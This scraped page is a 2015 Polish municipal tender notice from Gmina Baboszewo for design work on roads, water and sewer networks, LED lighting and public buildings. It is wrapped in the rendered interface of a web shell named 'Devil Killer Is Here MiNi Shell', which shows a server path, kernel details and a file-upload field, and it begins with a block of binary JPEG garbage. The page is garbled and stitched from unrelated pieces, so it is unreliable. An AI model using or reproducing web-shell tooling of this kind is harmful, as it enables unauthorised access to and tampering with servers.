JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20150323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20150323/40223-N-2015.html

<p class="kh_header"><b>Baboszewo: Wykonanie dokumentacji projektowych dla potrzeb realizacji zadań inwestycyjnych Gminy Baboszewo.</b><br>
<b>Numer ogłoszenia: 40223 - 2015; data zamieszczenia: 23.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Baboszewo , ul. Warszawska 9A, 09-130 Baboszewo, woj. mazowieckie, tel. 23 6611091, 6611092, 6611082, faks 23 6611071.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugbaboszewo.bip.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowych dla potrzeb realizacji zadań inwestycyjnych Gminy Baboszewo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie dokumentacji projektowych dla potrzeb  realizacji zadań inwestycyjnych Gminy Baboszewo.      
CZĘŚĆ I ZAMÓWIENIA: Wykonanie dokumentacji projektowych przebudowy dróg gminnych i ulic                      w Baboszewie. 
Zadanie 1 - Wykonanie dokumentacji projektowych przebudowy dróg gminnych:
1. Projekt przebudowy drogi gminnej Nr 300186W -   w miejscowości Śródborze o długości  ok. 892 m,
2. Projekt przebudowy drogi gminnej  Nr 300131W  - w miejscowości Lutomierzyn o długości ok. 1770 m, 
3. Projekt przebudowy drogi gminnej Nr 300118W Korzybie, Brzeście, Kowale - w miejscowości Zbyszyno              
   o długości  ok. 750 m, 
4. Projekt przebudowy drogi gminnej Nr 301114W  Bożewo - granice gminy  o długości  ok. 750 m,
5. Projekt przebudowy drogi gminnej Nr 300124 W  Mystkowo-Cywiny Wojskie o dł.  ok 2340 m
6. Projekt przebudowy drogi gminnej Nr 300125W Cywiny Wojskie - Bożewo  ok. 2900 m 
7. Projekt przebudowy drogi gminnej Nr 300121W Zbyszyno -Brzeście Nowe  o dł. ok.4820m

Zadanie 2-  Wykonanie dokumentacji projektowych przebudowy ulic w Baboszewie:
1. Projekt przebudowy ulicy Akacjowej o długości  ok. 145 m,   
2. Projekt przebudowy ulicy Zacisze o długości  ok. 221 m,
3. Projekt przebudowy ulicy Jaśminowej o długości  ok. 112 m,
4. Projekt przebudowy ulicy Topolowej o długości  ok. 227,5 m,
5. Projekt przebudowy ulicy Kwiatowej o długości  ok. 367 m,
6. Projekt Przebudowy ulicy Wrzosowej o długości  ok. 116,5 m,
7. Projekt przebudowy ulicy Polnej o długości  ok. 980 m,

CZĘŚĆ II ZAMÓWIENIA: Wykonanie dokumentacji projektowej budowy wodociągu z przyłączami                        i kanalizacji sanitarnej z przyłączami oraz kanalizacji deszczowej w miejscowości Baboszewo.
Założenia do projektowania (przewidywane długości uzbrojenia).
1) Wodociąg: ok.1300m w 4 ulicach (Akacjowa, Zacisze, Jaśminowa, Topolowa, Kwiatowa), ok. 45 przyłączy do posesji.
2) Kanalizacja sanitarna: ok. 2300m w 6 ulicach (Akacjowa, Zacisze, Jaśminowa, Topolowa, Kwiatowa, Wrzosowa)  ok. 45 przyłączy do posesji,
3) Kanalizacja deszczowa: ok. 500m w 5 ulicach (Akacjowa , Zacisze, Jaśminowa, Topolowa, Kwiatowa)

CZĘŚĆ III ZAMÓWIENIA: Wykonanie dokumentacji projektowej budowy 112 przydomowych oczyszczalni ścieków zlokalizowanych na terenie gminy Baboszewo  - III etap.
Technologia wykonania przydomowych oczyszczalni ścieków będzie określona po wyborze najkorzystniejszej oferty na wykonanie dokumentacji projektowej, z uwzględnieniem wskazań Zamawiającego, propozycji projektanta oraz potrzeb przyszłych użytkowników, możliwości lokalizacyjnych i lokalnych warunków gruntowo-wodnych.

CZĘŚĆ IV ZAMÓWIENIA: Wykonanie dokumentacji  projektowych budowy oświetlenia z linią elektroenergetyczną kablową:
Zadanie 1  - Projekt budowy oświetlenia LED z linią elektroenergetyczną kablową, w układzie gwiaździstym  o dł. ok. 2570 m  w miejscowości Dziektarzewo, w układzie liniowym przy drodze Dziektarzewo -Goszczyce Poświętne - ok. 1190 m, w układzie liniowym przy drodze Dziektarzewo -Rybitwy ok. 450 m.
Zadanie 2 - Projekt budowy oświetlenia LED z linią elektroenergetyczną kablową, w układzie liniowym  o dł. ok. 1400 m  w miejscowości Wola Dłużniewska.
Zadanie 3  - Projekt budowy oświetlenia LED z linią elektroenergetyczną kablową  w Baboszewie  na ul. Akacjowej - ok. 135 m,   Wrzosowej- ok.110 m, Zielonej -  ok.500 m,  Jaśminowej - ok. 110 m, Kwiatowej -180 m, Zacisze  - ok. 150 m, Grobickiego - ok. 180 m, Mazowieckiej  ok. 220 m., Glinojeckiej ok. 100 m.

CZĘŚĆ V ZAMÓWIENIA: Wykonanie dokumentacji  projektowych budowy, remontu i termomodernizacji budynków.
Zadanie 1  -  Wykonanie dokumentacji projektowych  termomodernizacji budynków:
1)Szkoła Podstawowa w Baboszewie - 3 kondygnacje.                                                                                         Wymiary budynku:  (szer. 19 m  ; dł. 30 m  , wys.12,50 m) + (szer. 9,70 dł. 18,90, wys. 12,50)  - (minus ściana wspólna o szer. 12,50 m, wys. 11,0 m) - (minus ściana wspólna z Gimnazjum o szer. 16,40 wys.  11,0 m ) 
2) Szkoła podstawowa w Mystkowie - dwie kondygnacje.  
 Wymiary budynku:   szer.  11   m ; dł.  55  m , wys. różne:  sala gimnastyczna  6,75 m;   łącznik 4,60  m,   budynek 
 główny ok. 7,00  m  (minus wspólna ściana z budynkiem  nowo dobudowanym   szer.  13 m ,  wys. 5,90)
              
3)Budynek socjalny w Śródborzu - dwie kondygnacje.
   Wymiary budynku:  szer. 16 m  ; dł. 16,30 m  , wys. 8 m     
    
4) Stacja uzdatniania wody w Cieszkowie Nowym - budynek parterowy
     Wymiary budynku : (szer. 12,80 m  ; dł. 20,30 m, wys. 4,60 m) + ( szer. 9,20 m , dł. 9,50, wys. 3,35)                
     - (minus ściana wspólna o szer. 9,20 m, wys. 3,85  m)  
              
Zadanie 2 -  Wykonanie  dokumentacji projektowej budowy obiektów kubaturowych:
1) Projekt budowy mieszkań socjalnych w Cywinach Dyngunach. 
    Budynek parterowy, dla 10 rodzin. Pięć mieszkań o pow. ok.35 m2 (pokój, kuchnia, łazienka) + pięć   
    mieszkań o pow.  ok. 40 m (pokój z aneksem kuchennym, mały pokój, łazienka).
   
2) Projekt budowy świetlicy wiejskiej w Niedarzynie 
    Budynek parterowy o pow. użytkowej  ok. 200 m2
      Pomieszczenia funkcyjne: 
    - garaż  o powierzchni  ok.  60 m2 na samochód strażacki.
    - świetlica wiejska z następującymi pomieszczeniami: sala o pow. ok. 90 m2  + ok. 50 m2 pozostałe 
     pomieszczenia  ( szatnia, toaleta -dwie kabiny, kuchnia, magazyn korytarz). 

Zadanie 3 - Wykonanie dokumentacji centralnego ogrzewania.
1) Projekt c.o.  budynku świetlicy wiejskiej w Woli Folwark
    Kubatura budynku  430 m3
    Sposób ogrzewania: gaz płynny ze zbiornika.
    
2) Projekt c.o. świetlica wiejska w Draminie
    Kubatura  budynku  620  m3
   Sposób ogrzewania: wkład kominkowy z płaszczem wodnym.

Zadanie  4 - Wykonanie dokumentacji projektowej remontu budynku Ośrodka Zdrowia w Sarbiewie
1.Wymiary budynku:  szer. 15 m (11m +4 m) ; dł. 19  m , wys.6,40  m.


2.  Wykonawca dokumentacji projektowej na budowę przydomowych oczyszczalni ścieków   jest zobowiązany do:
a) zapoznanie się z dokumentami będącymi w posiadaniu Zamawiającego  (szczegółowy wykaz właścicieli posesji zapisanych na przydomowe  oczyszczalnie ścieków)
b) szczegółowego sprawdzenie w terenie warunków wykonania zamówienia oraz uzyskanie  od właściciela posesji pisemnej akceptacji zaprojektowanej lokalizacji oczyszczalni. 
c) konsultacji z Zamawiającym (na każdym etapie projektowania)    istotnych rozwiązań technologicznych, konstrukcyjnych i materiałowych mających wpływ na koszty budowy przydomowych oczyszczalni ścieków.                                                                              d) pobrania ze Starostwa Powiatowego w Płońsku Wydział Geodezji, Katastru i Gospodarki Nieruchomościami mapek sytuacyjno-wysokościowych dot. działek,  na których będą budowane oczyszczalnie ścieków.
e) opisywania proponowanych materiałów za pomocą parametrów technicznych, tzn. bez podawania  nazw własnych,  producentów  lub pochodzenia.
f) wykonania projektu  zgodnie  z zasadami współczesnej wiedzy technicznej, obowiązującymi przepisami oraz normami i normatywami  z zastosowaniem w projekcie rozwiązań standardowych skutkujących optymalizacją  kosztów.
Zaprojektowane rozwiązania techniczne powinny gwarantować taki stopień oczyszczania, żeby ścieki mieściły się w zakresie parametrów, o których mowa w rozporządzeniu Ministra Środowiska z dnia 8 lipca 2004 r.  w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w   sprawie substancji   szczególnie szkodliwych dla środowiska wodnego   (Dz.U. Nr 168, poz. 1763). 
Wszystkie elementy oczyszczalni muszą posiadać odpowiednią wytrzymałość mechaniczną dostosowaną do zagłębienia pod powierzchnią terenu. Zamawiający wymaga, aby zaprojektowane zbiorniki były wykonane z tworzywa odpornego na udar np.  z potrójną ścianką.  Oczyszczalnie nie mogą być projektowane na głębokości większej niż dopuszcza to producent urządzeń. W szczególnie uzasadnionych przypadkach, gdy zachodzi konieczność zwiększonego zagłębienia oczyszczalni, projekt powinien przewidywać sposób wzmocnienia ich wytrzymałości mechanicznej. 
Każdorazowo projektant musi uwzględniać potrzeby przyszłych użytkowników, możliwości lokalizacyjne oraz lokalne warunki gruntowo-wodne.
g) Zamawiający  na etapie wyceny kosztów wykonania dokumentacji projektowej  nie określa  technologii   oczyszczania ścieków.  Proponowane rozwiązania  przez projektanta muszą uzyskać akceptację Zamawiającego.
h) Zamawiający zastrzega, że ilość zleconych do wykonania projektów może być zwiększona lub zmniejszona nie więcej jak                     o 10%   ogólnej liczby oczyszczalni  ścieków określonej w  załączonej tabeli.

II. Ogólne uwagi dotyczące przedmiotu zamówienia (wszystkich części):
1.Zalecane jest przeprowadzenie wizji lokalnej przed przystąpieniem do złożenia oferty. Wykonawcy, którzy chcą dokonać wizji lokalnej z udziałem przedstawiciela Zamawiającego,  winni zgłosić się do Urzędu Gminy Baboszewo w dniu 27 marca 2015 r. godz. 1000.                                                                                                                           2.Zamawiający wymaga od Wykonawcy przedłożenia  koncepcji  wykonania  projektu (szkice, opis)  w ciągu 14 dni od podpisania umowy na usługi projektowe.                                                                                                                                                                   3. Opracowane  dokumentacje projektowe w swojej treści nie mogą zawierać opisów utrudniających uczciwą konkurencję poprzez wskazanie znaków towarowych, patentów lub pochodzenia .                                                                4. Dokumentacje projektowe  należy  wykonać zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 02.09.2004 r. (tj.Dz. U. z 2013 r.  poz. 1129) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego oraz zgodnie z ustawą Prawo przedmiotu zamówienia, Polskich Norm i zasad wiedzy technicznej oraz sztuki budowlanej;  
5. Projektanci powinni posiadać uprawnienia budowlane nadane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane (t. j. Dz. U. z 2013 r. poz. 1409 ze zm.) lub inne ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do realizacji przedmiotu zamówienia.
6. Kosztorysy inwestorskie należy  wykonać zgodnie  z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja  2004 roku w  sprawie metod i podstaw sporządzania kosztorysu inwestorskiego  ( Dz. U.  z   2004 roku Nr 130, poz. 1289 )                                             - 1 egzemplarz w wersji pisemnej na każdy obiekt.                                                                                                                         7.Wykonawca zobowiązany jest do aktualizacji kosztorysów inwestorskich  w przypadku, gdy postępowanie                        o zamówienie publiczne będzie wszczęte powyżej 6 miesięcy od daty oszacowania wartości robót budowlanych.                                                                                                                                                                              8.W zakres zamówienia wchodzi opracowanie dokumentacji projektowych  łącznie z uzyskaniem pozwolenia na   budowę ze Starostwa Powiatowego w Płońsku, lub w przypadku robót wykonywanych na zgłoszenie informacja,  że Wydział Architektoniczno-Budowlany  nie wnosi uwag do zgłoszenia lub potwierdzenie, że minął 30 dniowy okres liczony od dnia zgłoszenia. Obowiązek uzyskania pozwolenia na budowę lub zgłoszenia nie dotyczy projektu przebudowy drogi gminnej Nr 300121W Zbyszyno -Brzeście Nowe.                                                                           9.Wykonawca zobowiązany jest do prowadzenia nadzoru autorskiego nad realizacją inwestycji w ramach wynagrodzenia za przedmiotowe zamówienie.  

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje wymagań w zakresie spełniania tego warunku i uzna, że został spełniony
 na podstawie oświadczenia złożonego przez Wykonawcę  zgodnie z art.44 uPzp i rozdz.VI pkt.1.1 SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)CZĘŚĆ I ZAMÓWIENIA - Wykonanie dokumentacji projektowej przebudowy dróg gminnych  i ulic                     w Baboszewie.
Opis sposobu dokonania oceny spełniania tego warunku:
Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
- jedną dokumentację  projektową  na budowę lub przebudowę dróg  o długości nie krótszej  niż 5 km oraz   
  przedłoży dowód potwierdzający, że usługa  została wykonane należycie,
                                                                              i 
- jedną dokumentację projektową na budowę lub przebudowę ulic o łącznej ich długości nie krótszej niż 1 km oraz   
  przedłoży dowód potwierdzający, że usługa  została wykonana należycie,
                                                                            lub
- jedną dokumentację projektową obejmującą swym zakresem łącznie budowę/ przebudowę dróg o długości nie   krótszej niż 5 km  i budowę/przebudowę ulic o łącznej długości nie krótszej niż 1 km  oraz  przedłoży dowód potwierdzający, że usługa  została wykonana należycie,

 
b)CZĘŚĆ II ZAMÓWIENIA - Wykonanie  dokumentacji projektowej budowy  wodociągu z przyłączami  i kanalizacji sanitarnej z przyłączami oraz kanalizacji deszczowej  w miejscowości Baboszewo.
Opis sposobu dokonania oceny spełniania tego warunku:
Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej:
-   jedną dokumentację projektową na budowę wodociągu z przyłączami o długości nie krótszej niż  1 km 
    oraz przedłoży dowód potwierdzający, że usługa została wykonana należycie,
                                                                          i 
-   jedną dokumentację projektową na budowę kanalizacji sanitarnych z przyłączami o długości nie krótszej  niż 2 
     km oraz przedłoży dowód potwierdzający, że usługa została wykonane należycie,
                                                                        lub 
-   jedną dokumentację projektową obejmującą swym zakresem  łącznie budowę wodociągu z przyłączami                       
    o długości nie krótszej niż 1 km i budowę kanalizacji sanitarnych z przyłączami o długości nie krótszej niż 2 km 
    oraz przedłoży dowód  potwierdzający, że usługa została wykonana należycie. 

c)CZĘŚĆ III ZAMÓWIENIA - Wykonanie dokumentacji projektowej budowy 112 przydomowych oczyszczalni ścieków zlokalizowanych na terenie gminy Baboszewo  - III etap. 
Opis sposobu dokonania oceny spełniania tego warunku:

Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
zaprojektował co najmniej po 50 przydomowych oczyszczalni ścieków w trzech różnych technologiach                           i przedłoży dokumenty potwierdzające, że zamówienia te zostały wykonane należycie.


d)CZĘŚĆ IV ZAMÓWIENIA -Wykonanie dokumentacji projektowej budowy oświetlenia LED z linią elektroenergetyczną kablową. 
Opis sposobu dokonania oceny spełniania tego warunku:
Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,
wykonał co najmniej jedną dokumentację projektową na budowę oświetlenia z linią elektroenergetyczną kablową                   o długości min. 2 km i przedłoży dowody potwierdzające, że usługa została wykonana należycie.

e)CZĘŚĆ V ZAMÓWIENIA - Wykonanie dokumentacji projektowych budowy, remontów                                            i termomodernizacji obiektów.
Opis sposobu dokonania oceny spełniania tego warunku:
Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną dokumentację projektową na budowę obiektów kubaturowych o powierzchni użytkowej nie mniejszej jak 300 m2  i  przedłoży dowody potwierdzające, że usługa  została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonania oceny spełniania tego warunku:
Zamawiający nie konkretyzuje wymagań w zakresie spełniania tego warunku i uzna, że został spełniony
 na podstawie oświadczenia złożonego przez Wykonawcę  zgodnie z art.44 uPzp i rozdz.VI pkt.1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)CZĘŚĆ I ZAMÓWIENIA - Wykonanie dokumentacji  projektowych przebudowy dróg gminnych i ulic             w Baboszewie.
Opis sposobu dokonywania oceny spełniania tego warunku:

Co najmniej jedną osobą posiadająca uprawnienia budowlane w zakresie projektowania dróg (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).

b)CZĘŚĆ II ZAMÓWIENIA - Wykonanie dokumentacji  projektowej budowy  wodociągu z przyłączami  i kanalizacji sanitarnej z przyłączami oraz kanalizacji deszczowej  w miejscowości Baboszewo.
Opis sposobu dokonywania oceny spełniania tego warunku:
Co najmniej jedną osobą posiadająca uprawnienia budowlane w zakresie projektowania w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).

c)CZĘŚĆ III ZAMÓWIENIA - Wykonanie dokumentacji projektowej budowy 112 przydomowych oczyszczalni ścieków zlokalizowanych na terenie gminy Baboszewo  - III etap. 
Opis sposobu dokonywania oceny spełniania tego warunku:
Co najmniej jedną osobą posiadająca uprawnienia budowlane w zakresie projektowania w specjalności instalacyjnej w zakresie sieci kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).

d)CZĘŚĆ IV ZAMÓWIENIA -Wykonanie dokumentacji projektowej budowy oświetlenia LED z linią elektroenergetyczną kablową. 
Opis sposobu dokonywania oceny spełniania tego warunku:

Co najmniej jedną osobą posiadająca uprawnienia budowlane w zakresie projektowania w specjalności instalacje, sieci i urządzenia elektryczne i elektroenergetyczne (lub odpowiadające im  równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).


e)CZĘŚĆ V ZAMÓWIENIA - Wykonanie dokumentacji projektowych budowy, remontów                                              i termomodernizacji obiektów:

Zadanie  1 -  Wykonanie dokumentacji projektowych termomodernizacji budynków.
Opis sposobu dokonywania oceny spełniania tego warunku:
Co najmniej jedną osobą posiadająca uprawnienia budowlane w zakresie projektowania w specjalności architektonicznej lub konstrukcyjno-budowlanej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).

Zadanie  2 -  Wykonanie dokumentacji projektowych budowy obiektów kubaturowych.
Opis sposobu dokonywania oceny spełniania tego warunku:
Co najmniej jedną osobą lub osoby (spełniające warunek łącznie) posiadającą/ posiadające  uprawnienia budowlane w zakresie projektowania w niżej wymienionych specjalnościach: 
 - architektonicznej;
- konstrukcyjno-budowlanej;
-  instalacyjnej w zakresie  instalacji i urządzeń cieplnych , wentylacyjnych, gazowych, wodociągowych                         i kanalizacyjnych;
-  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
 (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).

Zadanie  3 - Wykonanie dokumentacji projektowych centralnego ogrzewania. 
Opis sposobu dokonywnia oceny spełniania tego warunku:
Co najmniej jedną osobą posiadająca uprawnienia budowlane w zakresie projektowania w specjalności instalacyjnej w zakresie  instalacji  i urządzeń cieplnych, gazowych. (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).

Zadanie  4 - Wykonanie dokumentacji  projektowej remontu budynku Ośrodka Zdrowia w Sarbiewie. 
Opis sposobu dokonywania oceny spełniania tego warunku:
Co najmniej jedną osobą posiadająca uprawnienia budowlane w zakresie projektowania w specjalności  architektonicznej lub konstrukcyjno-budowlanej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie konkretyzuje wymagań w zakresie  wykazania spełniania warunku i uzna, że został spełniony
     na podstawie oświadczenia złożonego przez Wykonawcę  zgodnie z art.44 uPzp i rozdz.VI pkt.1.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
